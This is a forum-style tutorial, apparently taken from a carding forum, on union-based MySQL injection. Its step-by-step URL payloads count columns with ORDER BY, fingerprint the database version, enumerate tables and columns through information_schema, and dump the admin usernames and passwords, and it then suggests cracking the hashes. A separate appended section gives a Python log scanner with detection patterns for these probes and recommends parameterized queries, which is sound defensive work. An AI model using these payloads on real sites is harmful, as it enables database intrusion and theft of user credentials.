mysql has 2 types only, as mentioned above. you need to know the following things about the db you are attacking-

# number of columns
# table names
# column names

# let's start with the union attack, the most common one, every n00b should know it -

code:
=> http://test.com/index.php?id=1 order by 10--
^ this gives me an error

let's try again

code:
=> http://test.com/index.php?id=1 order by 7--
^ this gives me an error

let's try again

code:
=> http://test.com/index.php?id=1 order by 5--
whoa !! the page is loading normally

it means the number of columns => 5
you can do it with mssql as well.

# now the next part-
i'm using the union select statement.

code:
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
if it doesn't give you anything, change the first part of the query to a negative value.

code:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
it'll show some number on your screen. in my case it is 2. now we know that column 2 will echo data back to us.

# getting mysql version

code:
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
if you do not get it with this, try this-

code:
=> http://test.com/index.php?id=-1 union select 1,version(),3,4,5--
now you will get the version

it can be-

# 5+ (5 or newer)
# 5> (older than 5)

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

table extraction for version 5+ :

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
it'll show a lot of tables. if you want to get into the site, usually you need to get the admin's login info.
so, in my case i need to exploit a table named => admin

which contains the information i need

now i've got the table names & i need to extract the column names from them, so the query will be-

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
this will show you the column names inside the table admin. if it gives you an error you need to convert the text value admin into a mysql char() expression.
i use hackbar, a firefox addon, to do so.

so the char() form of admin is => char(97, 100, 109, 105, 110)

therefore the query will be-

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=char(97, 100, 109, 105, 110)--
it shows the column names to me. in my case they are-

# user_name
# user_password
# ***
# uid

we only need to know the username & pass, so we reject the other two. okay?

the next query will be for extracting the final data i need-

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--

where 0x3a is the hex value of => : (a colon, so the two fields come back separated)

voila !

i got the username & pass, it is => adminassword

the password can also be encrypted. so you can use a few online decrypters or a piece of software i know => password pro
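from the defender's side, here is an added example (not part of the original post): a small python scanner over web access logs that recognizes the probing sequence walked through above, the ORDER BY ladder followed by UNION SELECT, information_schema enumeration, char()-encoded strings and @@version. the log lines are constructed for the example and the indicator names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs
# Constructed Apache combined-format lines (not real traffic) replaying the sequence above.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20order%20by%207-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%20order%20by%205-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=-1%20union%20all%20select%201,@@version,3,4,5-- HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?id=-1%20union%20all%20select%201,group_concat(column_name),3,4,5%20from%20information_schema.columns%20where%20table_name=char(97,100,109,105,110)-- HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.168.1.5 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One indicator per step of the post: column-count probe, union injection,
# information_schema enumeration, version fingerprint, char()/0x-encoded literals.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "version_fingerprint": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "char_or_hex_literal": re.compile(r"\bchar\s*\(\s*\d+|\b0x[0-9a-f]{2,}", re.I),
}

def request_hits(line):
    """Parse one log line; return (ip, status, sorted indicator names) or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tags = set()
    # parse_qs URL-decodes each value, so %20 / + become the spaces the regexes expect
    for values in parse_qs(urlsplit(m["path"]).query, keep_blank_values=True).values():
        for value in values:
            tags.update(name for name, rx in INDICATORS.items() if rx.search(value))
    return (m["ip"], int(m["status"]), sorted(tags)) if tags else None

def scan_log(text):
    return [h for h in (request_hits(l) for l in text.splitlines()) if h]

def summarize(hits):
    """Per source IP: repeated ORDER BY probes (usually 5xx) then a UNION SELECT is flagged."""
    per_ip = defaultdict(lambda: {"order_by_probes": 0, "probe_errors": 0, "union": False})
    for ip, status, tags in hits:
        e = per_ip[ip]
        if "order_by_probe" in tags:
            e["order_by_probes"] += 1
            e["probe_errors"] += status >= 500
        e["union"] |= "union_select" in tags
    return {ip: dict(e, suspicious=e["order_by_probes"] >= 2 and e["union"]) for ip, e in per_ip.items()}
```

detection like this is only a backstop; the fix for the injection itself is a parameterized query for id, which turns the whole payload into a single non-numeric value that matches nothing.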

read more: http://cardingmafia.ws/f26/mysql-inj...#ixzz3uqcbwv9q